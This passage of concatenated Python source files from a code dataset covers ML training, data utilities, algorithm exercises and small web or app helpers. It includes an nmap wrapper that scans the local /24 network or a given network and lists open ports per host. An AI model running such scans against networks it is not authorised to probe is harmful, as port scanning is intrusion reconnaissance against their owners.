:constants.FEEDBACK_SUBJECT_MAX_CHAR_LIMIT]\n\n            if ' ' in updated_subject:\n                updated_subject = ' '.join(updated_subject.split(' ')[:-1])\n\n            item.subject = updated_subject + '...'\n        else:\n            item.subject = first_message.text\n        item.put(update_last_updated_time=False)\n\n    @staticmethod\n    def reduce(key, value):\n        pass\n","sub_path":"core/domain/feedback_jobs_one_off.py","file_name":"feedback_jobs_one_off.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"194826710","text":"# -*- coding:utf-8 -*-\nimport data_utilities\nimport mysql.connector\nimport math\n\ndef predict(person, destination=0, data_set='univ'):\n\tmean_person = get_mean(person, destination, data_set=data_set)\n\treturn mean_person\n\ndef get_mean(person, destination=0, data_set='univ'):\n\tx, y = person['x'], person['y']\n\tcnx = mysql.connector.connect(user='kyota', host='127.0.0.1', database=data_set)\n\tcursor = cnx.cursor()\n\n\t_person = person.copy()\n\t# floor_x, ceil_x = math.floor(x), math.ceil(x)\n\t# floor_y, ceil_y = math.floor(y), math.ceil(y)\n\tx, y = int(round(x)), int(round(y))\n\n\ttable = get_table_name(destination)\n\twhere = \"`round(x)` = \"+str(x)+\" and `round(y)` = \"+str(y)\n\tquery = \"select `mean(v)`, `mean(theta)` from \"+table+\" where \"+where\n\tcursor.execute(query)\n\trow = cursor.fetchone()\n\tif (row):\n\t\tv, theta = float(row[0]), float(row[1])\n\t\t_person['v'], _person['theta'] = v, theta\n\t\t_person = data_utilities.set_vx_vy(_person)\n\t\treturn _person\n\treturn {'x': 0, 'y': 0, 'vx': 0, 'vy': 0}\n\ndef get_table_name(destination=0):\n\ttable_name = \"\"\n\tif (destination > 0):\n\t\ttable_name = \"stats_vx_plus\"\n\telif (destination < 0):\n\t\ttable_name = \"stats_vx_minus\"\n\telse:\n\t\ttable_name = [\"stats_vx_plus\", \"stats_vx_minus\"]\n\treturn table_name\n\n","sub_path":"researchs/tracking/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"83972868","text":"\nfrom Task3loader import Task3_loader\nfrom Task1Loader import Task1_loader\nfrom runner import *\nfrom face_recognition import FaceRecog\nimport torch\nfrom torch import nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom pytorchcv.model_provider import get_model\nimport torchvision.models as models\n\nimport os\n\nclass Head(torch.nn.Module):\n    def __init__(self, in_f, out_f):\n        super(Head, self).__init__()\n        \n        self.f = nn.Flatten()\n        self.l = nn.Linear(in_f, 512)\n        self.d = nn.Dropout(0.75)\n        self.o = 
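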
nn.Linear(512, out_f)\n        self.b1 = nn.BatchNorm1d(in_f)\n        self.b2 = nn.BatchNorm1d(512)\n        self.r = nn.ReLU()\n\n    def forward(self, x):\n        x = self.f(x)\n        x = self.d(x)\n\n        x = self.l(x)\n        x = self.r(x)\n        x = self.d(x)\n\n        out = self.o(x)\n        return out\n\nclass FCN(torch.nn.Module):\n    def __init__(self, base, in_f):\n        super(FCN, self).__init__()\n        self.base = base\n        self.h1 = Head(in_f, 1)\n        self.classif = nn.Sigmoid()\n    \n    def forward(self, x):\n        x = self.base(x)\n        x = self.h1(x)\n        return x, self.classif(x)\n\n\ndef main():\n\n    batch_size = 20\n\n    # model = models.resnet18(pretrained=False)\n    model = get_model(\"xception\", pretrained=True)\n    model = nn.Sequential(*list(model.children())[:-1]) # Remove original output layer\n\n    model[0].final_block.pool = nn.Sequential(nn.AdaptiveAvgPool2d(1)) # xcep\n    model = FCN(model, 2048)\n    model.cuda()\n    train_data = Task3_loader()\n    test_data = Task1_loader(\"./Task_2_3/test.csv\", phase='test')\n\n    train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=True, num_workers=8)\n    valid_loader = DataLoader(test_data, batch_size=batch_size, shuffle=False, num_workers=8)\n\n\n    criterion = nn.BCELoss()\n    # optimizer = optim.SGD(model.parameters(), lr=0.0018, momentum=0.27)\n    optimizer = optim.Adam(model.parameters(), lr=1e-4, weight_decay=1e-5)\n\n    train(model, train_loader, valid_loader, criterion, optimizer, 100, device='cuda')\n\nif __name__ == '__main__':\n    #main()\n    model = torch.load(\"./checkpoints/Kaggle_pretrained.pkl\")\n    train_data = Task1_loader(\"./Task_1/train.csv\", phase='train')\n    test_data = Task1_loader(\"./Task_2_3/test.csv\", phase='test')\n    batch_size = 20\n    train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=True, num_workers=8)\n    valid_loader = DataLoader(test_data, batch_size=batch_size, shuffle=False, num_workers=8)\n\n\n    criterion = nn.BCELoss()\n    # optimizer = optim.SGD(model.parameters(), lr=0.0018, momentum=0.27)\n    optimizer = optim.Adam(model.parameters(), lr=5e-5, weight_decay=1e-5)\n\n    train(model, train_loader, valid_loader, criterion, optimizer, 100, device='cuda')\n","sub_path":"task3_main.py","file_name":"task3_main.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"544552368","text":"import unittest\nfrom src.data_structures.mockdata import MockData\n\n\nclass TestMockData (unittest.TestCase):\n\n    def setUp(self):\n\n        self.data = MockData()\n\n    def test_random_data(self):\n        data = MockData()\n        a_set = data.get_random_elements(10)\n        self.assertTrue(len(a_set) == 10, \"the data should have 10 elements!\")\n\n\n# the main guard must live at module level; nested inside the class it never runs\nif __name__ == '__main__':\n    unittest.main()","sub_path":"tests/data_stuctures/test_mockdata.py","file_name":"test_mockdata.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"347059899","text":"import matplotlib.pyplot as plt\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\n\niris = load_iris()\n# print(type(iris))\n# print(iris.data)\n\nX = iris.data # feature matrix\ny = iris.target # response vector\n\nprint(X.shape)\n# print('X=>', X)\nprint(y.shape)\n# print('y=>', y)\n\nX_new = [[3, 5, 4, 2], [5, 4, 3, 2]] # test data\n\nknn = KNeighborsClassifier(n_neighbors=1)\n# print(knn)\nknn.fit(X, y)\nknn1_y_pred = 
knn.predict(X)\n# print(\"1 neighbor KNN prediction =>\", knn.predict(X_new))\n# checking the training accuracy\nprint(\"Prediction metric KNN1\", metrics.accuracy_score(y, knn1_y_pred))\n\n# TUNING the model with KNN 5\nknn = KNeighborsClassifier(n_neighbors=5)\nknn.fit(X, y)\nknn5_y_pred = knn.predict(X)\n# print(\"5 neighbor KNN prediction =>\", knn.predict(X_new))\n# checking the training accuracy\nprint(\"Prediction metric KNN5\", metrics.accuracy_score(y, knn5_y_pred))\n\n# Using Logistic regression model\nlogreg = LogisticRegression()\nlogreg.fit(X, y)\nlogreg_y_pred = logreg.predict(X)\n# checking the training accuracy\nprint(\"Prediction metric Logistic regression\", metrics.accuracy_score(y, logreg_y_pred))\n\n'''\n training and testing\n'''\n\n# step 1 : split raing and testing data\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, )\n# step 2 : make prediction on testing set\n# logreg\nlogreg = LogisticRegression()\nlogreg.fit(X_train, y_train)\nlogreg_y_test_pred = logreg.predict(X_test)\nprint(\"Prediction metric Logistic regression\", metrics.accuracy_score(y_test, logreg_y_test_pred))\n\n# KNN 5\nknn = KNeighborsClassifier(n_neighbors=5)\nknn.fit(X_train, y_train)\nknn_y_test_pred = knn.predict(X_test)\nprint(\"Prediction metric KNN5\", metrics.accuracy_score(y_test, knn_y_test_pred))\n\n# KNN 1\nknn = KNeighborsClassifier(n_neighbors=1)\nknn.fit(X_train, y_train)\nknn_y_test_pred = knn.predict(X_test)\nprint(\"Prediction metric KNN1\", metrics.accuracy_score(y_test, knn_y_test_pred))\n\n# determining the best k value\nk_range = range(1, 91)\nscore = []\nfor k in k_range:\n knn = KNeighborsClassifier(n_neighbors=k)\n knn.fit(X_train, y_train)\n knn_y_test_pred = knn.predict(X_test)\n # print(\"Prediction metric KNN1\", metrics.accuracy_score(y_test, knn_y_test_pred))\n score.append(metrics.accuracy_score(y_test, knn_y_test_pred))\n\nplt.plot(k_range, score)\nplt.xlabel('value of K for KNN')\nplt.ylabel('Testing accuracy')\nplt.show()\n","sub_path":"src/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"233431513","text":"import numpy as np\n\n\ndef is_valid_cell(cell, num_rows, num_cols):\n '''\n Determines whether a cell is within the bounds of the grid\n\n Parameters\n ----------\n cell : tuple\n row and column index\n num_rows: int\n num_cols: int\n \n Returns\n -------\n bool\n True if cell is within grid bounds\n\n '''\n i, j = cell\n if i >= 0 and i < num_rows and j >=0 and j < num_cols:\n return True\n else:\n return False\n\n# Could do something smarter in this function if you know the direction of the start position\ndef get_directions(type=\"diag\"):\n '''\n Returns all of the possible directions to travel in the grid, given a type of neighborhood\n\n Parameters\n ----------\n type: string\n Gives the type of neighborhood (diag,square)\n \n Returns\n -------\n list of tuples\n '''\n if type == \"diag\":\n return [(0,-1),(-1,-1),(-1,0),(-1,1),(0,1),(1,1),(1,0),(1,-1)]\n elif type ==\"square\":\n return [(0,-1),(-1,0),(0,1),(1,0)]\n\n\ndef get_valid_neighbors(cur_cell, visited_grid, grid):\n\n \n '''\n Returns all the neighbors of a given cell that are valid cells, unvisited, and not an obstacle\n\n Parameters\n ----------\n cur_cell : tuple\n row and column index\n visited_grid: np.array\n Boolean grid with visited cells True\n grid: np.array\n Potential function grid\n \n Returns\n -------\n neighbors: list\n List 
of indices (tuples) of valid neighbors\n '''\n\n num_rows, num_cols = visited_grid.shape\n directions = get_directions()\n neighbors = []\n for dir in directions:\n nr = cur_cell[0] + dir[0]\n nc = cur_cell[1] + dir[1]\n if is_valid_cell((nr,nc),num_rows,num_cols) and not visited_grid[nr,nc] and grid[nr,nc]:\n neighbors.append((nr,nc))\n return neighbors\n \n\n\ndef potential_function(map, goal_cell):\n '''\n Computes the potential function for the grid starting at the goal state\n \n Parameters\n ----------\n grid: np.array\n Binary 2d matrix with obstacles as 0\n \n goal_cell: tuple\n Index of goal cell in grid\n \n Returns\n -------\n grid: np.array\n Potential function on the grid\n\n '''\n row,col = goal_cell\n p = 1\n grid = np.copy(map)\n visited_grid = np.zeros_like(grid,dtype=bool)\n # initialize goal potential to 1\n grid[row,col] = p\n visited_grid[row,col] = True\n cur_set = [goal_cell]\n while cur_set:\n p += 1\n next_set = []\n for cell in cur_set:\n cr, cc = cell\n neighbors = get_valid_neighbors(cell, visited_grid, grid)\n for neighbor in neighbors:\n nr,nc = neighbor\n grid[nr,nc] = p\n visited_grid[nr,nc] = True\n next_set.append(neighbor)\n \n cur_set = next_set\n \n return grid\n\n \n\n \ndef main():\n grid_map = np.array([[1,1,1,1,1,0],[1,1,0,1,1,0],[1,1,0,0,1,0],[1,1,1,1,1,0],[1,1,1,1,1,1]])\n \n original = potential_function(grid_map,(1,3))\n new_potential = potential_function(original,(3,2))\n print(new_potential)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"webots_project/mavic_Edit_python/controllers/mavic2proPython/modules/wavefront.py","file_name":"wavefront.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"188655280","text":"from flask import Flask, render_template, request, redirect, url_for\n\nclass Tarriff:\n def __init__(\n self,\n name,\n *,\n price = 0,\n price_period = 'month',\n gb = 0,\n minutes = 0,\n sms = 0,\n hit = False,\n gb_unlim = None,\n minutes_unlim_tele2 = True,\n archived = False\n ):\n self.name = name\n self.price = price\n self.price_period = price_period\n self.gb = gb\n self.minutes = minutes\n self.sms = sms\n self.hit = hit\n self.gb_unlim = gb_unlim\n self.minutes_unlim_tele2 = minutes_unlim_tele2\n self.archived = archived\n\nclass TarriffManager:\n def __init__(self):\n self.items = []\n\n def add(self,item):\n self.items.append(item)\n\n def actual(self):\n # фактически задача поиска:\n # archived == False\n return list(filter(lambda tariff: not tariff.archived, self.items))\n\n def archived(self):\n return list(filter(lambda tarriff: tarriff.archived == True, self.items))\n\n\n\n\n\n\n\n\n","sub_path":"app/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161947718","text":"from django import template\n\nfrom zuma.apps.servicios.models import Servicios, Categoria \n\nregister = template.Library()\n\n@register.inclusion_tag('servicios_index.html', takes_context=True)\ndef show_servicios(context):\n\tcategoria = Categoria.objects.get(nombre='desarrollo')\n\tservicios = Servicios.objects.filter(categoria_general=categoria).order_by('id')[:3]\n\n\treturn{ 'MEDIA_URL':context['MEDIA_URL'], 'servicios':servicios 
}","sub_path":"zuma/apps/servicios/templatetags/servicios_tags.py","file_name":"servicios_tags.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"160783137","text":"# LC235 Lowest Common Ancestor of a Binary Tree\n# Medium\n\n# Given a binary tree, find the lowest common ancestor (LCA) of two given nodes in the tree.\n# According to the definition of LCA on Wikipedia: \"The lowest common ancestor is defined between two nodes p and q as the lowest node in T that has both p and q as descendants (where we allow a node to be a descendant of itself).\"\n\n\n# Note:\n# All of the nodes' values will be unique.\n# p and q are different and both values will exist in the binary tree.\n\n\nfrom A02_TreeNode import *\n\n\nclass Solution(object):\n\n # Version A, use the bianry heap method by showPerfectNodeLayers\n # This will not pass the max time limit\n def showPerfectNodeLayers(self, root):\n \"\"\"\n Generate a perfect binary heap in list of nodes (Not Values)\n use None to replace empty Nodes for take index places\n \"\"\"\n if not root:\n return []\n result = [root]\n layer = [root]\n while any(layer):\n new_layer = []\n for i in layer:\n if not i:\n new_layer.append(None)\n new_layer.append(None)\n else:\n new_layer.append(i.left if i.left else None)\n new_layer.append(i.right if i.right else None)\n result += new_layer\n layer = new_layer\n\n # add the first one to be None, to move the index starting from 1\n result = [None] + result\n return result\n\n def lowestCommonAncestor(self, root: \"TreeNode\", p: \"TreeNode\", q: \"TreeNode\") -> \"TreeNode\":\n binaryheap = self.showPerfectNodeLayers(root)\n\n i, pi, qi = 0, 0, 0\n while i != len(binaryheap):\n node = binaryheap[i]\n if node is p:\n pi = i\n if node is q:\n qi = i\n i += 1\n\n parent_p, parent_q = [], []\n while pi != 0:\n parent_p.append(pi)\n pi = pi // 2\n while qi != 0:\n parent_q.append(qi)\n qi = qi // 2\n\n while parent_p and parent_q:\n A, B = parent_p.pop(), parent_q.pop()\n if A == B:\n lca = A\n else:\n break\n\n return binaryheap[lca]\n\n\nclass Solution(object):\n # STD ans\n # Time: O(n)\n # Space: O(h)\n def lowestCommonAncestor(self, root: \"TreeNode\", p: \"TreeNode\", q: \"TreeNode\") -> \"TreeNode\":\n if root in (None, p, q):\n return root\n\n left = self.lowestCommonAncestor(root.left, p, q)\n right = self.lowestCommonAncestor(root.right, p, q)\n\n # 1. If the current subtree contains both p and q,\n # return their LCA.\n # 2. If only one of them is in that subtree,\n # return that one of them.\n # 3. 
If neither of them is in that subtree,\n # return the node of that subtree.\n\n # return root if left and right else left or right\n # 等同于扩展成\n if left and right:\n return root\n if left:\n return left\n if right:\n return right\n # 精妙解释:\n # 如果一个节点的两侧,分别包含了一个p和一个q,那么这个节点就是最低了\n # 否则的话, 就会出现一侧为空, 另一个包含两个, 这样就可以往包含两个的那一侧递归\n\n\nif __name__ == \"__main__\":\n A = genTree([\n 3,\n 5, 1,\n 6, 2, 0, 8,\n None, None, 7, 4,\n ])\n assert Solution().lowestCommonAncestor(A, A.left, A.right) == A, \"Example 1\"\n\n A = genTree([\n 3,\n 5, 1,\n 6, 2, 0, 8,\n None, None, 7, 4,\n ])\n assert Solution().lowestCommonAncestor(A, A.left, A.left.right.right) == A.left, \"Example 2\"\n\n A = genTree([\n 3,\n 5, 1,\n 6, 2, 0, 8,\n None, None, 7, 4,\n ])\n assert Solution().lowestCommonAncestor(A, A.left.left, A.left.right.right) == A.left, \"Additional 1\"\n\n A = genTree([\n 3,\n 5, 1,\n 6, 2, 0, 8,\n None, None, 7, 4,\n ])\n assert Solution().lowestCommonAncestor(A, A.left.right, A.right.left) == A, \"Additional 2\"\n\n A = genTree([\n 2,\n None, 3\n ])\n assert Solution().lowestCommonAncestor(A, A, A.right) == A, \"Additional 3\"\n\n A = genTree([\n 2,\n 1, None\n ])\n assert Solution().lowestCommonAncestor(A, A, A.left) == A, \"Additional 4\"\n\n print(\"All passed\")\n","sub_path":"LeetCode/LC236_lowest_common_ancestor_of_a_binary_tree.py","file_name":"LC236_lowest_common_ancestor_of_a_binary_tree.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"212331949","text":"from __future__ import absolute_import, division, print_function, unicode_literals\ntry:\n from urllib import urlretrieve, urlopen\nexcept ImportError:\n from urllib.request import urlretrieve, urlopen\nimport numpy as np\nimport pandas as pd\nfrom pandas.tseries.offsets import BDay\nimport os\nimport datetime as dt\nimport logging\n\ndef download(ticker, file_name,logger):\n url = 'http://www.google.com/finance/historical?startdate=%s&enddate=%s&output=csv&q=%s'%('Jan 03, 2000','Dec 31, 2016',ticker.lower())\n status = urlopen(url).getcode()\n if status == 200:\n logger.info('Downloading %s data to file: %s'%(ticker, file_name))\n urlretrieve(url, file_name)\n return True\n else:\n logger.info('File not found. Please check settings!')\n return False\n\ndef data_available(m,logger):\n dir_name = '../historicalData/'\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n file_name = '%s%s.csv'%(dir_name, m.lower())\n if os.path.exists(file_name):\n print('%s exists'%file_name)\n return True\n else:\n try:\n assert(download(m, file_name,logger))\n return True\n except AssertionError:\n logger.exception(\"%s not found. Ommitting!\"%file_name)\n return False \n\ndef download_security_list(exchange, logger):\n\n file_name = '../%s.txt'%exchange.lower()\n if not os.path.exists(file_name):\n url = 'https://raw.githubusercontent.com/Auquan/auquan-historical-data/master/%s'%(file_name)\n status = urlopen(url).getcode()\n if status == 200:\n logger.info('Downloading data to file: %s'%file_name)\n urlretrieve(url, file_name)\n return True\n else:\n logger.info('File not found. 
Please check exchange settings!')\n            return False\n    else:\n        return True\n\ndef get_logger():\n    logger_name = dt.datetime.now().strftime('%Y-%m-%d %H-%M-%S')\n    logger = logging.getLogger(logger_name)\n    logger.setLevel(logging.DEBUG)\n    logger_dir = 'runLogs/'\n    logger_file = '%srun-%s.txt'%(logger_dir,logger_name)\n    if not os.path.exists(logger_dir):\n        os.makedirs(logger_dir)\n    formatter = logging.Formatter('%(message)s')\n    file_handler = logging.FileHandler(logger_file)\n    console_handler = logging.StreamHandler()\n    file_handler.setFormatter(formatter)\n    console_handler.setFormatter(formatter)\n    logger.addHandler(file_handler)\n    logger.addHandler(console_handler)\n    return logger\n\n\nlogger = get_logger()\nmarkets = []\nexchange='all'\n#Download list of securities\nassert(download_security_list(exchange, logger))\nif len(markets)==0:\n    file_name = '../%s.txt'% exchange.lower()\n    markets = [line.strip() for line in open(file_name)]\n\nprint(markets)\nmarket_to_drop = []\nfor market in markets:\n    print('checking %s'%market)\n    is_avail = data_available( market, logger)\n    print(' %s available'%market)\n    if not is_avail:\n        market_to_drop.append(market)\n# removing from the list while iterating over it skips elements; drop failures afterwards\nfor market in market_to_drop:\n    markets.remove(market)\n\nfile_name = '../stocks.txt'\nf = open(file_name,'w')\nfor m in markets:\n    print(m)\n    f.write('%s'%m)\n    f.write('\\n')\n\nprint('Done')\n\n\n\n","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"283022602","text":"import jieba\r\nimport pandas as pd\r\nimport numpy as np\r\nimport math\r\n\r\ndef std(list):\r\n    std = 0\r\n    for item in list:\r\n        std += item**2\r\n    return math.sqrt(std/len(list))\r\n\r\ndef average(list):\r\n    return sum(list)/len(list)\r\n\r\ndef getsplitreview(location):\r\n    bookreview = pd.read_csv(location)\r\n    splitbookreviewdetail = []\r\n    splitbookreview = []\r\n    for reviewpassage in bookreview['review']:\r\n        temp1 = list(jieba.cut(reviewpassage, cut_all=False))\r\n        splitbookreview.extend(temp1)\r\n        splitbookreviewdetail.append(temp1)\r\n    rating = list(bookreview['rating'])\r\n    return splitbookreview, splitbookreviewdetail, rating\r\n\r\ndef createVocabList(dataSet, percent):\r\n    vocabSet = set([])\r\n    numbercount = {}\r\n    for word in dataSet:\r\n        vocabSet = vocabSet | set(word)\r\n        if word not in numbercount.keys():\r\n            numbercount[word] = 1\r\n        if word in numbercount.keys():\r\n            numbercount[word] += 1\r\n    sortednumbercount = list(sorted(numbercount.items(), key= lambda d:d[1],reverse = True))\r\n    finaldataset = sortednumbercount[len(sortednumbercount)//percent:-len(sortednumbercount)//percent]\r\n    finalfinaldataset = list(np.array(finaldataset).transpose()[0])\r\n    return finalfinaldataset\r\n\r\ndef bagOfWords2Vec(vocabList, inputSet):\r\n    returnVec = [0] * len(vocabList)\r\n    for word in inputSet:\r\n        if word in vocabList:\r\n            returnVec[vocabList.index(word)] += 1\r\n    return returnVec","sub_path":"bookreviewfunctions.py","file_name":"bookreviewfunctions.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"420628776","text":"class Line:\n    def __init__(self, coor1,coor2):\n        self.coor1 = coor1\n        self.coor2 = coor2\n\n    def distance(self):\n        x1,y1 = self.coor1\n        x2,y2 = self.coor2\n        return ((x2-x1)**2 +(y2-y1)**2)**.5\n\nc1 = (3,2)\nc2 = (8,10)\nl = 
Line(c1,c2)\nprint(l.distance())\n","sub_path":"line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"326809904","text":"import pygame, sys\nfrom settings import (\n DISPLAYSURF,\n colors, grid_x, grid_y,\n nr_of_rows, nr_of_collumns,\n grid_start_x, grid_start_y\n)\n\n\nclass Node:\n def __init__(self, x=None, y=None, name=None, prev_node=None):\n self.name = name\n self.prev_node = prev_node\n self.distance = 1000000000\n self.x = x\n self.y = y\n self.address = [x,y]\n self.wx= grid_x-1\n self.wy=grid_y-1\n self.color = colors['cream']\n\n def adjacent_addresses(self):\n vectors = (\n [-1*grid_x,0],\n [grid_x,0],\n [0,grid_y],\n [0,-1*grid_y],\n )\n return [ [self.x+v[0], self.y+v[1]] for v in vectors ]\n\n def click_check(self, mouse):\n if (\n (self.x <= mouse[0] and self.x + self.wx >= mouse[0])\n and\n (self.y <= mouse[1] and self.y + self.wy >= mouse[1])\n ):\n return True\n\n def draw(self):\n pygame.draw.rect(\n DISPLAYSURF,\n self.color,\n (self.x, self.y, self.wx, self.wy)\n )\n\n# Create Matrix of Nodes\ndef create_grid(nr_of_rows, nr_of_collumns):\n node_list = []\n for row in range(nr_of_rows):\n for collumn in range(nr_of_collumns):\n node_list.append(\n Node(\n name='{}-{}'.format(collumn, row),\n x=collumn*grid_x+grid_start_y,\n y=row*grid_x+grid_start_x,\n )\n )\n return node_list\n\nnode_list = create_grid(\n nr_of_rows,\n nr_of_collumns,\n)\n","sub_path":"src/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357532348","text":"#!/usr/bin/env python\n# coding: utf-8\n\n'''\nAuthor: Bogomolov I\ne-mail: i32311113@icloud.com\nClass that represent Nmap interface that:\n-raise only ScanerError with description\n-and have next 6 methods:\n--init(): get nmap and try execute it\n--__check_network(): check string like 192.168.2.5/30\n--__get_ip_address(): get address from specified iface\n--scan_connected(): run nmap and scan connected /24 network\n--scan_custom(): run nmap and scan specified network\n--parse_result(): decode nmap output and create dict from it\n'''\n\nfrom __future__ import print_function\nimport re, socket, fcntl, struct\nfrom subprocess import check_output\nfrom subprocess import Popen, PIPE\n\nclass ScanerError(Exception):\n\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return '{0}: {1}'.format('NetworkScaner.py', self.message)\n\nclass Scaner(object):\n\n def __init__(self, nmap_path='nmap'):\n '''\n nmap_path - may use not system nmap, like '/opt/***/nmap'\n Check if nmap exist/executed\n and get local addresses from interfaces\n '''\n command_for_test = [nmap_path + ' -V']\n version_pattern = re.compile(r'version\\s(\\S+)\\s')\n test_result = check_output(command_for_test, shell=True)\n if version_pattern.search(test_result):\n self.nmap_version = version_pattern.search(test_result).group(1)\n else:\n raise ScanerError('Nmap not executed!')\n self.command_default = [nmap_path]\n self.raw_result = ''\n self.result = {}\n\n def __check_network(self, network):\n '''\n Check if network correct\n '''\n flag = False\n try:\n tmp = network.split('/')[0].split('.') + network.split('/')[-1:]\n except:\n flag = True\n if len(tmp) != 5:\n flag = True\n for i in tmp[:-1]:\n try:\n if int(i) > 255 or int(i) < 0:\n flag = True\n except:\n flag = True\n try:\n if int(tmp[-1]) > 32 or 
int(tmp[-1]) < 0:\n flag = True\n except:\n flag = True\n return flag\n\n def __get_ip_address(self, ifname):\n '''\n Return ip address from iface\n '''\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n return socket.inet_ntoa(fcntl.ioctl(\n s.fileno(),\n 0x8915, # SIOCGIFADDR\n struct.pack('256s', ifname[:15])\n )[20:24])\n\n def scan_connected(self, iface):\n '''\n Scan connected network from interface\n only with /24 mask\n '''\n try:\n network = self.__get_ip_address(iface)\n network = '.'.join(network.split('.')[:-1] + ['0']) + '/24'\n except:\n raise ScanerError(\\\n 'Can\\'t get address from interface ' + repr(iface))\n if self.__check_network(network): #\n raise ScanerError(\\\n 'Incorrect network address ' + repr(network))\n proc = Popen(self.command_default + [network], stdout=PIPE, stderr=PIPE)\n out, err = proc.communicate()\n self.raw_result += '\\n\\n' + out + '\\n\\n' + err\n\n def scan_custom(self, network):\n '''\n Scan only specified net\n '''\n if self.__check_network(network):\n raise ScanerError(\\\n 'Incorrect network address ' + repr(network))\n proc = Popen(self.command_default + [network], stdout=PIPE, stderr=PIPE)\n out, err = proc.communicate()\n self.raw_result += '\\n\\n' + out + '\\n\\n' + err\n\n def parse_result(self):\n '''\n Return dict with nmap scan result, like:\n {'192.168.3.13': [], '192.168.3.6': ['443/tcp', '902/tcp', '912/tcp', '5357/tcp']}\n '''\n if self.raw_result == '':\n raise ScanerError('Call scan*-methods first.')\n ip_pattern = re.compile(r'Nmap\\sscan\\sreport\\sfor\\s(\\S+)')\n port_pattern = re.compile(r'(\\S+)/(\\w+)\\s.+')\n ip_0 = ''\n ports = []\n for st in self.raw_result.split('\\n'):\n if ip_pattern.search(st):\n self.result[ip_0] = ports\n ports = []\n ip_0 = ip_pattern.search(st).group(1)\n if port_pattern.search(st):\n ports.append(port_pattern.search(st).group(1) \\\n + '/' + port_pattern.search(st).group(2))\n self.result[ip_0] = ports\n del self.result['']\n return self.result\n\nif __name__ == '__main__':\n\n # Self testing\n\n s = Scaner('/usr/bin/nmap')\n #s.scan_custom('254.254.16.12/32'); print('Frist done!')\n #s.scan_custom('254.254.16.12/35'); print('Second done!')\n s.scan_connected('eth0')\n print(s.parse_result())\n exit(0)","sub_path":"collectors/CollectorOS/NetworkScaner.py","file_name":"NetworkScaner.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"443522573","text":"#!/usr/bin/python\r\n# -*- coding: UTF-8 -*-\r\n#\r\n# 局部加权线性回归\r\n# 牛顿法\r\n#\r\nimport numpy as np\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef load_data():\r\n \"\"\" 加载数据 \"\"\"\r\n dataset = []\r\n f = open('a.txt', 'r')\r\n for line in f.readlines():\r\n x = line.strip().split()\r\n dataset.append([float(x[0]), float(x[1]), float(x[2])])\r\n f.close()\r\n return dataset\r\n\r\n\r\nclass LWR(object):\r\n \"\"\"\r\n 局部加权线性回归\r\n 随机梯度\r\n \"\"\"\r\n def __init__(self, x_train, tau=0.04): # 0.04合适\r\n self.x = np.array(x_train)\r\n self.m, self.n = self.x.shape\r\n self.tau = tau\r\n\r\n def predict(self, x, alpha=0.01, max_it=500):\r\n np.random.seed(seed=int(time.time()))\r\n theta = np.zeros(self.n - 1)\r\n w = np.exp(-(x - self.x[:, 1])**2 / (2*self.tau**2))\r\n a = range(self.m)\r\n for itr in range(max_it):\r\n rs = np.random.choice(a, self.m, replace=False) # 构造随机访问序列\r\n for i in rs:\r\n error = self.x[i, 2] - np.sum(self.x[i, 0:2] * theta)\r\n if np.abs(error) < 1e-6:\r\n #print '---', itr\r\n return x * 
